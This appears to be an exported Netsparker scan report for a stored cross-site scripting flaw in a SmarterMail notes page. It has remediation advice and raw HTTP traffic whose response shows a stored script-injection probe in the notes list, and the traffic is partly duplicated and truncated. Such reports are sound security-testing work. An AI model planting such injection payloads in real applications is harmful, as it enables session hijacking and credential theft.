NETSPARKER SCAN REPORT SUMMARYNetsparker - Scan Report Summary
|
||||||||||
|
Total Requests225525Average Speed9.69 req/sec. |
17
identified
11
confirmed
0
critical
3
informational
|
||||||||
SCAN SETTINGSScan Settings
|
||||||||||
|
Proxy
Authentication
Scheduled
|
|||||||||
VULNERABILITIESVulnerabilities
|
||
 |
IMPORTANT
29 %
MEDIUM
35 %
LOW
18 %
INFORMATION
18 %
|
|
Permanent Cross-site Scripting
Permanent Cross-site Scripting
2
TOTAL
IMPORTANT
CONFIRMED
2
Netsparker confirmed this vulnerability by analyzing the execution of injected JavaScript.
Permanent XSS (Cross-site Scripting) allows an attacker to execute dynamic scripts (Javascript, VbScript) in the context of the application. This allows several different attack opportunities, mostly hijacking the current session of the user or changing the look of the page by changing the HTML on the fly and to steal the user's credentials. This happens because the input entered by the user has been interpreted by HTML/Javascript/VbScript within the browser.
Permanent means that the attack will be stored in the back-end system. In normal XSS attacks an attack needs to e-mail the victim but in a permanent XSS an attacker can just execute the attack and wait for users to see the affected page. As soon as someone visits the page, the attacker's stored payload will get executed.
XSS targets the users of the application instead of the server. Although this is a limitation, since it only allows attackers to hijack other users' session the attacker might attack an administrator to gain full control over the application.
Impact
Permanent XSS is a dangerous issue that has many exploitation vectors, some of which includes:
- User session sensitive information such as cookies can be stolen.
- XSS can enable client-side worms which could modify, delete or steal other users' data within the application.
- The website can be redirected to a new location, defaced or used as a phishing site.
Remedy
The issue occurs because the browser interprets the input as active HTML, Javascript or VbScript. To avoid this, all input and output from the application should be filtered. Output should be filtered according to the output format and location. Typically the output location is HTML. Where the output is HTML ensure that all active content is removed prior to its presentation to the server.
Prior to sanitizing user input, ensure you have a pre-defined list of both expected and acceptable characters with which you populate a white-list. This list needs only be defined once and should be used to sanitize and validate all subsequent input.
There are a number of pre-defined, well structured white-list libraries available for many different environments, good examples of these include, OWASP Reform and Microsoft Anti Cross-site Scripting libraries are good examples.
Remedy References
External References
|
- /Main/frmNotes.aspx
/Main/frmNotes.aspx CONFIRMED |
Injection URL
http://vulnerable.smartermail.7.x.host:9998/Main/frmNotes.aspx
Injection Request
GET /Main/frmNotes.aspx HTTP/1.1
Referer: http://vulnerable.smartermail.7.x.host:9998/Main/frmNote.aspx
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; CloudScan Vulnerability Crawler http://cloudscan.me)
Cache-Control: no-cache
Host: vulnerable.smartermail.7.x.host:9998
Cookie: ASP.NET_SessionId=e25dkk45nuvkgrr4d1exuxrn; SelectedLanguage=en
Accept-Encoding: gzip, deflate
Connection: Keep-Alive
Referer: http://vulnerable.smartermail.7.x.host:9998/Main/frmNote.aspx
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; CloudScan Vulnerability Crawler http://cloudscan.me)
Cache-Control: no-cache
Host: vulnerable.smartermail.7.x.host:9998
Cookie: ASP.NET_SessionId=e25dkk45nuvkgrr4d1exuxrn; SelectedLanguage=en
Accept-Encoding: gzip, deflate
Connection: Keep-Alive
Identification Request
GET /Main/frmNotes.aspx HTTP/1.1
Referer: http://vulnerable.smartermail.7.x.host:9998/Main/frmNote.aspx
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; CloudScan Vulnerability Crawler http://cloudscan.me)
Cache-Control: no-cache
Host: vulnerable.smartermail.7.x.host:9998
Cookie: ASP.NET_SessionId=e25dkk45nuvkgrr4d1exuxrn; SelectedLanguage=en
Accept-Encoding: gzip, deflate
Connection: Keep-Alive
Referer: http://vulnerable.smartermail.7.x.host:9998/Main/frmNote.aspx
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; CloudScan Vulnerability Crawler http://cloudscan.me)
Cache-Control: no-cache
Host: vulnerable.smartermail.7.x.host:9998
Cookie: ASP.NET_SessionId=e25dkk45nuvkgrr4d1exuxrn; SelectedLanguage=en
Accept-Encoding: gzip, deflate
Connection: Keep-Alive
Injection Response
HTTP/1.0 200 OK
Server: SmarterTools/2.0.3925.24451
Date: Sun, 03 Oct 2010 06:17:59 GMT
X-AspNet-Version: 2.0.50727
Content-Encoding:
X-Compressed-By: HttpCompress
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 10711
Connection: Close
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head id="ctl00_Head1"><title>
My Notes - hoytllc.com - SmarterMail
</title><meta http-equiv="Page-Enter" content="blendTrans(Duration=0)" /><meta http-equiv="Page-Exit" content="blendTrans(Duration=0)" /><link href="/App_Themes/Default/CSS/StyleSheet.ashx?guid=1CB60CF5B830100_1.6.3925.24513_7.2.3925.24521&fileMask=Main/&rtl=false" rel="stylesheet" type="text/css" /><link href="/App_Themes/Default/CSS/StyleSheet.ashx?guid=1CB60CF5B830100_1.6.3925.24513_7.2.3925.24521&fileMask=Mail/&rtl=false" rel="stylesheet" type="text/css" /><link href="/App_Themes/Default/CSS/StyleSheet.ashx?guid=1CB60CF5B830100_1.6.3925.24513_7.2.3925.24521&fileMask=Telerik&rtl=false" rel="stylesheet" type="text/css" />
<!--[if lte IE 6]>
<style type="text/css">@import '/App_Themes/Default/CSS/StyleSheet.ashx?guid=1CB60CF5B830100_1.6.3925.24513_7.2.3925.24521&fileMask=BrowserOverrides/ie6&rtl=false';</style>
<![endif]-->
<meta http-equiv="cache-control" content="no-cache"><meta http-equiv="pragma" content="no-cache"></head>
<body class="" dir="ltr">
<form method="post" action="frmNotes.aspx" id="aspnetForm">
<div>
<input type="hidden" name="__EVENTTARGET" id="__EVENTTARGET" value="" />
<input type="hidden" name="__EVENTARGUMENT" id="__EVENTARGUMENT" value="" />
<input type="hidden" name="__VIEWSTATE" id="__VIEWSTATE" value="/wEPDwULLTExNDA1MDIwMjQPFggeCF9fX1RpdGxlBQhNeSBOb3Rlcx4QX19fUmVzdWx0RmFpbHVyZWUeEF9fX1Jlc3VsdFN1Y2Nlc3NlHgRfc0dGZxYCZg9kFgICAQ9kFgwCAw9kFgICAQ9kFgQCAQ8PFgQeC05hdmlnYXRlVVJMZR4XQ2xpZW50U2lkZVNjcmlwdE9uQ2xpY2sFOk9wZW5OZXdNZXNzYWdlKCdmcm1Ob3RlLmFzcHg/cmV0PTEmcG9wdXA9dHJ1ZScsIDYwMCwgNTAwKTtkZAIDDw8WAh4OTmF2aWdhdGVUYXJnZXQFC2RvdWJsZWNsaWNrZGQCBA8WAh4Fc3R5bGUFDWRpc3BsYXk6bm9uZTsWAgIBD2QWBgIBDw9kFgIeCk9uS2V5UHJlc3MFS3JldHVybiBFbnRlckhhbmRsZXIoZXZlbnQsIGZ1bmN0aW9uKCl7X19kb1Bvc3RCYWNrKCdjdGwwMCRTUEgkYnRuR28nLCcnKX0pO2QCAg8QD2QWAh8IBUtyZXR1cm4gRW50ZXJIYW5kbGVyKGV2ZW50LCBmdW5jdGlvbigpe19fZG9Qb3N0QmFjaygnY3RsMDAkU1BIJGJ0bkdvJywnJyl9KTsQFQYKQWxsIENvbG9ycwVXaGl0ZQZZZWxsb3cEUGluawVHcmVlbgRCbHVlFQYABXdoaXRlBnllbGxvdwRwaW5rBWdyZWVuBGJsdWUUKwMGZ2dnZ2dnZGQCAw8QD2QWAh8IBUtyZXR1cm4gRW50ZXJIYW5kbGVyKGV2ZW50LCBmdW5jdGlvbigpe19fZG9Qb3N0QmFjaygnY3RsMDAkU1BIJGJ0bkdvJywnJyl9KTsQFQMOQWxsIENhdGVnb3JpZXMLTm8gQ2F0ZWdvcnkBMRUDAAEgATEUKwMDZ2dnZGQCBg8WAh4HVmlzaWJsZWhkAgcPZBYCZg9kFgICAQ8WAh8JaBYCAgEPFgIeBFRleHRlZAIIDxYCHwloZAILD2QWAgIDD2QWAgIBD2QWAmYPZBYCAgEPDxYCHwoFCzU4OCBub3RlKHMpZGQYAgUXY3RsMDAkTmF2UEgkSHlwZXJQYWdlcjEPBSBjdGwwMF9NUEhfSHlwZXJHcmlkMXwxMnwwfDl8NTB8MGQFFGN0bDAwJE1QSCRIeXBlckdyaWQxDwUxVHJ1ZXxUcnVlfHxGYWxzZXxUcnVlfHJlYWxkYXRlIGRlc2N8RmFsc2V8RmFsc2V8MGQScTidPWg+9KYUh0Ketg+uYEqWIg==" />
</div>
<script type="text/javascript">
//<![CDATA[
var theForm = document.forms['aspnetForm'];
if (!theForm) {
theForm = document.aspnetForm;
}
function __doPostBack(eventTarget, eventArgument) {
if (!theForm.onsubmit || (theForm.onsubmit() != false)) {
theForm.__EVENTTARGET.value = eventTarget;
theForm.__EVENTARGUMENT.value = eventArgument;
theForm.submit();
}
}
//]]>
</script>
<script src="/WebResource.axd?d=lFfe_wSSLYBiWo0hdQTqNA2&t=633802452069218315" type="text/javascript"></script>
<script src="/ScriptResource.axd?d=9LtTppofNdzfPwjqAv6ngOF_m3Ok_PFqwhuv90rOoA_SHM2fVCRbipJCEnE9OMFtjNNZaXF1BttRFjWpHbAPstnprDdIVLeDszcVmLsdfwM1&t=ffffffff8fb8c655" type="text/javascript"></script>
<script src="/ScriptResource.axd?d=PkU8JqZ1AqOnNUfS9wB-O8XFAfH3kdpAehi09BJok9KiMBXqeEWZLvdsdUFLbPxYAD0iIeAHZBtPh1mybNd0fzbzD1H1EGEbNX_3WW4l9J01&t=ffffffffec2d9970" type="text/javascript"></script>
<script src="/ScriptResource.axd?d=PkU8JqZ1AqOnNUfS9wB-O8XFAfH3kdpAehi09BJok9KiMBXqeEWZLvdsdUFLbPxYxlutgliktFrtyUOE-2vtH5p7RzBBFeKiwavJVGKo3xk1&t=ffffffffec2d9970" type="text/javascript"></script>
<script type="text/javascript">
self.EnableAnimations = false;
</script>
<script type="text/javascript" src="/App_Themes/Default/Javascript/JavaScript.ashx?guid=1CB60CF5B830100_1.6.3925.24513_&fileMask="></script>
<script type="text/javascript">
//<![CDATA[
Sys.WebForms.PageRequestManager._initialize('ctl00$ScriptManager1', document.getElementById('aspnetForm'));
Sys.WebForms.PageRequestManager.getInstance()._updateControls(['tctl00$UpdatePanel1','tctl00$MPH$UP1','tctl00$NavPH$UpdatePanel2','tctl00$CntPH$UpdatePanel3'], ['ctl00$BPH$DeleteIcon','ctl00$SPH$btnGo','ctl00$SPH$btnClear'], [], 90);
//]]>
</script>
<div id="ctl00_TitleBar_HeaderPanel" class="PageTitle">
<div class="RoundedPageTitleLeft">
<div id="PageTitle" class="PageTitleText">
My Notes
</div>
</div>
</div>
<div id="ctl00_ButtonRow" class="ButtonBar">
<div class="ButtonBarLeft">
<div id="ctl00_BPH_btnAddNote" class="BBButton"><a class="ButtonBarAnchor" target="_self" href="#" tabindex='0' onclick="OpenNewMessage('frmNote.aspx?ret=1&popup=true', 600, 500);; return false;"><span class="BBInner">New</span></a></div>
<div id="ctl00_BPH_EditIcon" class="BBButton"><a class="ButtonBarAnchor" href="#" tabindex='0' onclick="DoEdit_ctl00_BPH_EditIcon(); return false;"><span class="BBInner">Edit</span></a></div>
<div id="ctl00_BPH_DeleteIcon" class="BBButton"><a class="ButtonBarAnchor" href="#" tabindex='0' onclick="DoDeleteQuery_ctl00_BPH_DeleteIcon(); return false;"><span class="BBInner">Delete</span></a></div>
<div id="ctl00_BPH_btnShowHideSearchBar" class="BBButton"><a class="ButtonBarAnchor" target="_self" href="#" tabindex='0' onclick="ToggleSearch();; return false;"><span class="BBInner">Search</span></a></div>
</div>
<div class="ButtonBarRight">
</div>
<div class="ButtonBarClear">
<div class="ie6fix">
</div>
</div>
</div>
<div id="ctl00_SearchRow" class="SearchRow" style="display:none;">
<table class="SearchContents">
<tr>
<td class="SCText">
Search
<input name="ctl00$SPH$txtSearchString" type="text" id="ctl00_SPH_txtSearchString" OnKeyPress="return EnterHandler(event, function(){__doPostBack('ctl00$SPH$btnGo','')});" />
<select name="ctl00$SPH$lstColors" id="ctl00_SPH_lstColors" OnKeyPress="return EnterHandler(event, function(){__doPostBack('ctl00$SPH$btnGo','')});">
<option value="">All Colors</option>
<option value="white">White</option>
<option value="yellow">Yellow</option>
<option value="pink">Pink</option>
<option value="green">Green</option>
<option value="blue">Blue</option>
</select>
<select name="ctl00$SPH$lstCategories" id="ctl00_SPH_lstCategories" OnKeyPress="return EnterHandler(event, function(){__doPostBack('ctl00$SPH$btnGo','')});">
<option selected="selected" value="">All Categories</option>
<option value=" ">No Category</option>
<option value="1">1</option>
</select>
</td>
<td class="SCButtons">
<div id="ctl00_SPH_btnGo" class="BBButton"><a class="ButtonBarAnchor" target="_self" href="#" tabindex='0' onclick=" __doPostBack('ctl00$SPH$btnGo',''); return false;"><span class="BBInner">Find Now</span></a></div>
<script type="text/javascript">
window.setInterval("if (invalid) { invalid = false; Refresh(); }", 333);
function Refresh() { __doPostBack('ctl00$SPH$btnGo',''); }
function ClearText()
{
var el = document.getElementById('ctl00_SPH_txtSearchString');
if (el) el.value = "";
el = document.getElementById('ctl00_SPH_lstCategories');
if (el) el.selectedIndex = 0;
el = document.getElementById('ctl00_SPH_lstColors');
if (el) el.selectedIndex = 0;
}
function DoubleClick(newUrl, uid, isNew)
{
OpenUniqueNewMessage(newUrl, 600, 500, uid);
}
</script>
<div id="ctl00_SPH_btnClear" class="BBButton"><a class="ButtonBarAnchor" target="_self" href="#" tabindex='0' onclick="ClearText(); __doPostBack('ctl00$SPH$btnClear',''); return false;"><span class="BBInner">Clear</span></a></div><script type='text/javascript'>ToggleSearchClear = function() { ClearText(); __doPostBack('ctl00$SPH$btnClear',''); return false; }</script>
</td>
</tr>
</table>
</div>
<span id="ctl00_UpdatePanel1">
</span>
<div id="Scrollable" class="ContentDiv">
<span id="ctl00_MPH_HyperContextMenu1">
<!-- HyperMenu -->
<div class='hmMenuBar '><div class='hmScroller'><div class='hmScrollUp'></div><ul class='hmMenu hmMenuBar hmSub hmContext hmList' id='ctl00_MPH_ctl01' name='ctl00$MPH$ctl01' style='z-index:800'>
<li class='hmItem hmFirst' id='ctl00_MPH_ctl01_hm0' style='z-index: 800'><a class='hmA' href='#'>Edit</a></li>
<li class='hmItem hmLast' id='ctl00_MPH_ctl01_hm1' style='z-index: 800'><a class='hmA' href='#'>Delete</a></li>
</ul>
<div class='hmScrollDown'></div></div>
</div>
</span>
<div id="ctl00_MPH_UP1">
<div class="HyperGridWrapper" id="ctl00_MPH_HyperGrid1">
<div class="HyperGrid">
<table class="HyperGrid" id="ctl00_MPH_HyperGrid1_Table">
<thead>
<tr><th scope="col" class="showsel lc CheckBoxColumn" style="overflow: hidden"><input type="checkbox" id="ctl00_MPH_HyperGrid1CheckAll" name="ctl00$MPH$HyperGrid1CheckAll" /></th><th scope="col" class="SmallImage" style="overflow: hidden"> </th><th scope="col" class="leftpad" style="overflow: hidden"><a class='SortableHeader' href="javascript:__doPostBack('ctl00$MPH$HyperGrid1','sort=text')">Note</a></th><th scope="col" class="rc leftpad" style="overflow: hidden"><a class='SortableHeader' href="javascript:__doPostBack('ctl00$MPH$HyperGrid1','sort=realdate')">Date<img src='/App_Themes/Default/Images/Misc/down.gif' /></a></th></tr>
</thead>
<tbody>
<tr class="firstrow"><td class="showsel lc CheckBoxColumn"><input type="checkbox" id="ctl00_MPH_HyperGrid1_CB64_ZmE3NGZjMWRhMjI5NDJlMTliMmI4YzI0Nzc1ZGY5ZDU-" name="ctl00_MPH_HyperGrid1_CB64_ZmE3NGZjMWRhMjI5NDJlMTliMmI4YzI0Nzc1ZGY5ZDU-" /></td><td class="SmallImage"><table class="NoteColor" cellSpacing="0" cellPadding="0" bgcolor="white" style="border:solid 1px gray" bordercolor="Black"><tr><td style="background-color: white;"> </td></tr></table></td><td class="leftpad">1</td><td class="rc leftpad">10/3/2010</td></tr>
<tr class="alt"><td class="showsel lc CheckBoxColumn"><input type="checkbox" id="ctl00_MPH_HyperGrid1_CB64_MzA1ZTg5YzI5MWYzNDYxMThiMzA2NDI3N2EwYTdiM2I-" name="ctl00_MPH_HyperGrid1_CB64_MzA1ZTg5YzI5MWYzNDYxMThiMzA2NDI3N2EwYTdiM2I-" /></td><td class="SmallImage"><table class="NoteColor" cellSpacing="0" cellPadding="0" bgcolor="white" style="border:solid 1px gray" bordercolor="Black"><tr><td style="background-color: white;"> </td></tr></table></td><td class="leftpad">'"--><script>netsparker(0x009584)</script></td><td class="rc leftpad">10/3/2010</td></tr>
<tr><td class="showsel lc CheckBoxColumn"><input type="checkbox" id="ctl00_MPH_HyperGrid1_CB64_YzcyY2MwNmYzZDAyNDU5MmFkNTBkMDY5ZDZmOTFiNDM-" name="ctl00_MPH_HyperGrid1_CB64_YzcyY2MwNmYzZDAyNDU5MmFkNTBkMDY5ZDZmOTFiNDM-" /></td><td class="SmallImage"><table class="NoteColor" cellSpacing="0" cellPadding="0" bgcolor="white" style="border:solid 1px gray" bordercolor="Black"><tr><td style="background-color: white;"> </td></tr></table></td><td class="leftpad">1</td><td class="rc leftpad">10/3/2010</td></tr>
<tr class="alt"><td class="showsel lc CheckBoxColumn"><input type="checkbox" id="ctl00_MPH_HyperGrid1_CB64_ZWMyNmNiMzM1YzY3NDJmMDliMjMyYzVlYjgxYTQ2ODU-" name="ctl00_MPH_HyperGrid1_CB64_ZWMyNmNiMzM1YzY3NDJmMDliMjMyYzVlYjgxYTQ2ODU-" /></td><td class="SmallImage"><table class="NoteColor" cellSpacing="0" cellPadding="0" bgcolor="white" style="border:solid 1px gray" bordercolor="Black"><tr><td style="background-color: white;"> </td></tr></table></td><td class="leftpad">1</td><td class="rc leftpad">10/3/2010</td></tr>
<tr><td class="showsel lc CheckBoxColumn"><input type="checkbox" id="ctl00_MPH_HyperGrid1_CB64_ZGVjNjA3YTkzZjc5NDc2NGIwNmZkMDYyZWJjYThhMGY-" name="ctl00_MPH_HyperGrid1_CB64_ZGVjNjA3YTkzZjc5NDc2NGIwNmZkMDYyZWJjYThhMGY-" /></td><td class="SmallImage"><table class="NoteColor" cellSpacing="0" cellPadding="0" bgcolor="white" style="border:solid 1px gray" bordercolor="Black"><tr><td style="background-color: white;"> </td></tr></table></td><td class="leftpad">1</td><td class="rc leftpad">10/3/2010</td></tr>
<tr class="alt"><td class="showsel lc CheckBoxColumn"><input type="checkbox" id="ctl00_MPH_HyperGrid1_CB64_MmU4NTI1NGZkNzVlNDgxNDlmNjViNjZjZTM0NDY4YzE-" name="ctl00_MPH_HyperGrid1_CB64_MmU4NTI1NGZkNzVlNDgxNDlmNjViNjZjZTM0NDY4YzE-" /></td><td class="SmallImage"><table class="NoteColor" cellSpacing="0" cellPadding="0" bgcolor="white" style="border:solid 1px gray" bordercolor="Black"><tr><td style="background-color: white;"> </td></tr></table></td><td class="leftpad">1</td><td class="rc leftpad">10/3/2010</td></tr>
<tr><td class="showsel lc CheckBoxColumn"><input type="checkbox" id="ctl00_MPH_HyperGrid1_CB64_MjBkM2VmODY1MjJlNDkxNThhODY3MjNmMGYzNzlhYTM-" name="ctl00_MPH_HyperGrid1_CB64_MjBkM2VmODY1MjJlNDkxNThhODY3MjNmMGYzNzlhYTM-" /></td><td class="SmallImage"><table class="NoteColor" cellSpacing="0" cellPadding="0" bgcolor="white" style="border:solid 1px gray" bordercolor="Black"><tr><td style="background-color: white;"> </td></tr></table></td><td class="leftpad">1</td><td class="rc leftpad">10/3/2010</td></tr>
<tr class="alt"><td class="showsel lc CheckBoxColumn"><input type="checkbox" id="ctl00_MPH_HyperGrid1_CB64_NzAwMmQxNDM2MWY4NDBhZjg0YWY2MWRjNmM3MzBmN2Y-" name="ctl00_MPH_HyperGrid1_CB64_NzAwMmQxNDM2MWY4NDBhZjg0YWY2MWRjNmM3MzBmN2Y-" /></td><td class="SmallImage"><table class="NoteColor" cellSpacing="0" cellPadding="0" bgcolor="white" style="border:solid 1px gray" bordercolor="Black"><tr><td style="background-color: white;"> </td></..
Server: SmarterTools/2.0.3925.24451
Date: Sun, 03 Oct 2010 06:17:59 GMT
X-AspNet-Version: 2.0.50727
Content-Encoding:
X-Compressed-By: HttpCompress
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 10711
Connection: Close
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head id="ctl00_Head1"><title>
My Notes - hoytllc.com - SmarterMail
</title><meta http-equiv="Page-Enter" content="blendTrans(Duration=0)" /><meta http-equiv="Page-Exit" content="blendTrans(Duration=0)" /><link href="/App_Themes/Default/CSS/StyleSheet.ashx?guid=1CB60CF5B830100_1.6.3925.24513_7.2.3925.24521&fileMask=Main/&rtl=false" rel="stylesheet" type="text/css" /><link href="/App_Themes/Default/CSS/StyleSheet.ashx?guid=1CB60CF5B830100_1.6.3925.24513_7.2.3925.24521&fileMask=Mail/&rtl=false" rel="stylesheet" type="text/css" /><link href="/App_Themes/Default/CSS/StyleSheet.ashx?guid=1CB60CF5B830100_1.6.3925.24513_7.2.3925.24521&fileMask=Telerik&rtl=false" rel="stylesheet" type="text/css" />
<!--[if lte IE 6]>
<style type="text/css">@import '/App_Themes/Default/CSS/StyleSheet.ashx?guid=1CB60CF5B830100_1.6.3925.24513_7.2.3925.24521&fileMask=BrowserOverrides/ie6&rtl=false';</style>
<![endif]-->
<meta http-equiv="cache-control" content="no-cache"><meta http-equiv="pragma" content="no-cache"></head>
<body class="" dir="ltr">
<form method="post" action="frmNotes.aspx" id="aspnetForm">
<div>
<input type="hidden" name="__EVENTTARGET" id="__EVENTTARGET" value="" />
<input type="hidden" name="__EVENTARGUMENT" id="__EVENTARGUMENT" value="" />
<input type="hidden" name="__VIEWSTATE" id="__VIEWSTATE" value="/wEPDwULLTExNDA1MDIwMjQPFggeCF9fX1RpdGxlBQhNeSBOb3Rlcx4QX19fUmVzdWx0RmFpbHVyZWUeEF9fX1Jlc3VsdFN1Y2Nlc3NlHgRfc0dGZxYCZg9kFgICAQ9kFgwCAw9kFgICAQ9kFgQCAQ8PFgQeC05hdmlnYXRlVVJMZR4XQ2xpZW50U2lkZVNjcmlwdE9uQ2xpY2sFOk9wZW5OZXdNZXNzYWdlKCdmcm1Ob3RlLmFzcHg/cmV0PTEmcG9wdXA9dHJ1ZScsIDYwMCwgNTAwKTtkZAIDDw8WAh4OTmF2aWdhdGVUYXJnZXQFC2RvdWJsZWNsaWNrZGQCBA8WAh4Fc3R5bGUFDWRpc3BsYXk6bm9uZTsWAgIBD2QWBgIBDw9kFgIeCk9uS2V5UHJlc3MFS3JldHVybiBFbnRlckhhbmRsZXIoZXZlbnQsIGZ1bmN0aW9uKCl7X19kb1Bvc3RCYWNrKCdjdGwwMCRTUEgkYnRuR28nLCcnKX0pO2QCAg8QD2QWAh8IBUtyZXR1cm4gRW50ZXJIYW5kbGVyKGV2ZW50LCBmdW5jdGlvbigpe19fZG9Qb3N0QmFjaygnY3RsMDAkU1BIJGJ0bkdvJywnJyl9KTsQFQYKQWxsIENvbG9ycwVXaGl0ZQZZZWxsb3cEUGluawVHcmVlbgRCbHVlFQYABXdoaXRlBnllbGxvdwRwaW5rBWdyZWVuBGJsdWUUKwMGZ2dnZ2dnZGQCAw8QD2QWAh8IBUtyZXR1cm4gRW50ZXJIYW5kbGVyKGV2ZW50LCBmdW5jdGlvbigpe19fZG9Qb3N0QmFjaygnY3RsMDAkU1BIJGJ0bkdvJywnJyl9KTsQFQMOQWxsIENhdGVnb3JpZXMLTm8gQ2F0ZWdvcnkBMRUDAAEgATEUKwMDZ2dnZGQCBg8WAh4HVmlzaWJsZWhkAgcPZBYCZg9kFgICAQ8WAh8JaBYCAgEPFgIeBFRleHRlZAIIDxYCHwloZAILD2QWAgIDD2QWAgIBD2QWAmYPZBYCAgEPDxYCHwoFCzU4OCBub3RlKHMpZGQYAgUXY3RsMDAkTmF2UEgkSHlwZXJQYWdlcjEPBSBjdGwwMF9NUEhfSHlwZXJHcmlkMXwxMnwwfDl8NTB8MGQFFGN0bDAwJE1QSCRIeXBlckdyaWQxDwUxVHJ1ZXxUcnVlfHxGYWxzZXxUcnVlfHJlYWxkYXRlIGRlc2N8RmFsc2V8RmFsc2V8MGQScTidPWg+9KYUh0Ketg+uYEqWIg==" />
</div>
<script type="text/javascript">
//<![CDATA[
var theForm = document.forms['aspnetForm'];
if (!theForm) {
theForm = document.aspnetForm;
}
function __doPostBack(eventTarget, eventArgument) {
if (!theForm.onsubmit || (theForm.onsubmit() != false)) {
theForm.__EVENTTARGET.value = eventTarget;
theForm.__EVENTARGUMENT.value = eventArgument;
theForm.submit();
}
}
//]]>
</script>
<script src="/WebResource.axd?d=lFfe_wSSLYBiWo0hdQTqNA2&t=633802452069218315" type="text/javascript"></script>
<script src="/ScriptResource.axd?d=9LtTppofNdzfPwjqAv6ngOF_m3Ok_PFqwhuv90rOoA_SHM2fVCRbipJCEnE9OMFtjNNZaXF1BttRFjWpHbAPstnprDdIVLeDszcVmLsdfwM1&t=ffffffff8fb8c655" type="text/javascript"></script>
<script src="/ScriptResource.axd?d=PkU8JqZ1AqOnNUfS9wB-O8XFAfH3kdpAehi09BJok9KiMBXqeEWZLvdsdUFLbPxYAD0iIeAHZBtPh1mybNd0fzbzD1H1EGEbNX_3WW4l9J01&t=ffffffffec2d9970" type="text/javascript"></script>
<script src="/ScriptResource.axd?d=PkU8JqZ1AqOnNUfS9wB-O8XFAfH3kdpAehi09BJok9KiMBXqeEWZLvdsdUFLbPxYxlutgliktFrtyUOE-2vtH5p7RzBBFeKiwavJVGKo3xk1&t=ffffffffec2d9970" type="text/javascript"></script>
<script type="text/javascript">
self.EnableAnimations = false;
</script>
<script type="text/javascript" src="/App_Themes/Default/Javascript/JavaScript.ashx?guid=1CB60CF5B830100_1.6.3925.24513_&fileMask="></script>
<script type="text/javascript">
//<![CDATA[
Sys.WebForms.PageRequestManager._initialize('ctl00$ScriptManager1', document.getElementById('aspnetForm'));
Sys.WebForms.PageRequestManager.getInstance()._updateControls(['tctl00$UpdatePanel1','tctl00$MPH$UP1','tctl00$NavPH$UpdatePanel2','tctl00$CntPH$UpdatePanel3'], ['ctl00$BPH$DeleteIcon','ctl00$SPH$btnGo','ctl00$SPH$btnClear'], [], 90);
//]]>
</script>
<div id="ctl00_TitleBar_HeaderPanel" class="PageTitle">
<div class="RoundedPageTitleLeft">
<div id="PageTitle" class="PageTitleText">
My Notes
</div>
</div>
</div>
<div id="ctl00_ButtonRow" class="ButtonBar">
<div class="ButtonBarLeft">
<div id="ctl00_BPH_btnAddNote" class="BBButton"><a class="ButtonBarAnchor" target="_self" href="#" tabindex='0' onclick="OpenNewMessage('frmNote.aspx?ret=1&popup=true', 600, 500);; return false;"><span class="BBInner">New</span></a></div>
<div id="ctl00_BPH_EditIcon" class="BBButton"><a class="ButtonBarAnchor" href="#" tabindex='0' onclick="DoEdit_ctl00_BPH_EditIcon(); return false;"><span class="BBInner">Edit</span></a></div>
<div id="ctl00_BPH_DeleteIcon" class="BBButton"><a class="ButtonBarAnchor" href="#" tabindex='0' onclick="DoDeleteQuery_ctl00_BPH_DeleteIcon(); return false;"><span class="BBInner">Delete</span></a></div>
<div id="ctl00_BPH_btnShowHideSearchBar" class="BBButton"><a class="ButtonBarAnchor" target="_self" href="#" tabindex='0' onclick="ToggleSearch();; return false;"><span class="BBInner">Search</span></a></div>
</div>
<div class="ButtonBarRight">
</div>
<div class="ButtonBarClear">
<div class="ie6fix">
</div>
</div>
</div>
<div id="ctl00_SearchRow" class="SearchRow" style="display:none;">
<table class="SearchContents">
<tr>
<td class="SCText">
Search
<input name="ctl00$SPH$txtSearchString" type="text" id="ctl00_SPH_txtSearchString" OnKeyPress="return EnterHandler(event, function(){__doPostBack('ctl00$SPH$btnGo','')});" />
<select name="ctl00$SPH$lstColors" id="ctl00_SPH_lstColors" OnKeyPress="return EnterHandler(event, function(){__doPostBack('ctl00$SPH$btnGo','')});">
<option value="">All Colors</option>
<option value="white">White</option>
<option value="yellow">Yellow</option>
<option value="pink">Pink</option>
<option value="green">Green</option>
<option value="blue">Blue</option>
</select>
<select name="ctl00$SPH$lstCategories" id="ctl00_SPH_lstCategories" OnKeyPress="return EnterHandler(event, function(){__doPostBack('ctl00$SPH$btnGo','')});">
<option selected="selected" value="">All Categories</option>
<option value=" ">No Category</option>
<option value="1">1</option>
</select>
</td>
<td class="SCButtons">
<div id="ctl00_SPH_btnGo" class="BBButton"><a class="ButtonBarAnchor" target="_self" href="#" tabindex='0' onclick=" __doPostBack('ctl00$SPH$btnGo',''); return false;"><span class="BBInner">Find Now</span></a></div>
<script type="text/javascript">
window.setInterval("if (invalid) { invalid = false; Refresh(); }", 333);
function Refresh() { __doPostBack('ctl00$SPH$btnGo',''); }
function ClearText()
{
var el = document.getElementById('ctl00_SPH_txtSearchString');
if (el) el.value = "";
el = document.getElementById('ctl00_SPH_lstCategories');
if (el) el.selectedIndex = 0;
el = document.getElementById('ctl00_SPH_lstColors');
if (el) el.selectedIndex = 0;
}
function DoubleClick(newUrl, uid, isNew)
{
OpenUniqueNewMessage(newUrl, 600, 500, uid);
}
</script>
<div id="ctl00_SPH_btnClear" class="BBButton"><a class="ButtonBarAnchor" target="_self" href="#" tabindex='0' onclick="ClearText(); __doPostBack('ctl00$SPH$btnClear',''); return false;"><span class="BBInner">Clear</span></a></div><script type='text/javascript'>ToggleSearchClear = function() { ClearText(); __doPostBack('ctl00$SPH$btnClear',''); return false; }</script>
</td>
</tr>
</table>
</div>
<span id="ctl00_UpdatePanel1">
</span>
<div id="Scrollable" class="ContentDiv">
